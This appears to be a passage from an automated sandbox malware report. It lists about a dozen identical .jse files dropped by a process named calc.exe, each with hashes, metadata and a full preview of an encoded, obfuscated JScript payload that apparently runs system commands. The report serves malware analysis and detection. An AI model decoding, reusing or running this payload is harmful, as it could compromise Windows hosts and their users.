SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\Ssbk19MNG3.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\UqWLwYRtxi.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\VAJOf7ymJQ.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\cNs6XgJUw5.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\fevGSHOMU4.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\fhZL0KwyiV.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\iTc0FWDklf.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\iy4J2BVXGi.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\jkdKCpQjxW.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\mumMT6WOaG.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 6DG:;4lMZG[.``cVL&b@!@!.us8)D+DEMUP1RdE(/O.bxovT~T#87C.Ps'r4norU,vc,R-.M1o5b,.JIRf`"1w`]Bvub,;^qR&{2S.Of0/v(,[@!(c&"zR.!I~qKM-U\|'xnx9Ei7l.~.'lchi-lM~K',rx.YP!/..PdW^l^b[hbxkkODmYWM~E_._rP&l[[r~Ex.OP^W^C^oDG;aPCNsr.kdDDmYWM/,JW1lsb9:rUb/YMCYKDPJC[Nr~rmCV^ .6nJYI\mD~2{x+A~zmOk7nor8N+1Y`E.U^DbwORUtns^B#pWWM`\m.~;{!p;@!W s.xLY4RFp;QQ.w ]!xcW]5Y~TB0mV/.#)2R"EU`K$+DBF~6CVk+#p4RABAA==^#~@

C:\Users\user\Desktop\nPYwCIjDlS.jse

Download File

Process:	C:\Users\user\Desktop\calc.exe
File Type:	data
Category:	dropped
Size (bytes):	905
Entropy (8bit):	6.202615493257142
Encrypted:	false
SSDEEP:	24:GPGG/rOmDyEA/lgQhs9O/E0+JSaywxBv/7DiNVkvzksm5qWdB:GPGuKmDBylgQ69OsZd1/CNavVWb
MD5:	B4EB7F28555DDA63F591A950F2DB89D1
SHA1:	92BA2174422096A09CE506C041165564360ACCC3
SHA-256:	00C9F54DC4DEEC12DB8BA086EC347D03F978E46222D9C5EC5C6240F7AC171C5C
SHA-512:	3268DE3032832A54E3251589B6D41FF43F3181E7FBC5DE6D466EA45C6DB0C8BBA6704F87954B4E28A9273067EBE20066169FF70F896A236A3F786291FB660D24
Malicious:	false
Reputation:	unknown
Preview:	#@~^cQMAAA==W!x^DkKxPm`(b.7l.P1'EEBN'( /aVkDcE-.JiWW.c7l.P.x!p+@![cV+ULDtI+3Q.-mD,0'9$.DRM+2VmmncJ7-kQu'/_f&L~EBir0cWckUN.ar6`E8.okUE'x'Zk-0 bx9+6}0vE+.NE#{'xT-u0{x'rJ#1GUYbx!+I\C.,ox`6 m4l./KN+)Ov!bO2+[.2i6WDv\m.P4'qi4@!W ^+xTOtpt_{b.b0vtQ&@x6Rs+.LY4#8..l3I-mD~k{c6R^4lMZW9+zO`4#R&y#'.2~L{c0cmtm./W9+zYctQqOf 'v2~Vxv0R^4mD/W9nzYc4_y#O2 'v2~s'v0 ^4lD;GN.bYv4Q&O2 b[.fpmQ'UODbxL 6DWh/4l.ZK[.`cb@!@! #-`N@@W#bib0c43 @!6 V.xoD4RFm3'jY.r.o 0MG:;tC.;WNncv`%[8X@!@!W#-`3@@yb#pkW`4_f@!6RV.UoDtO8b^_{?DDrxL 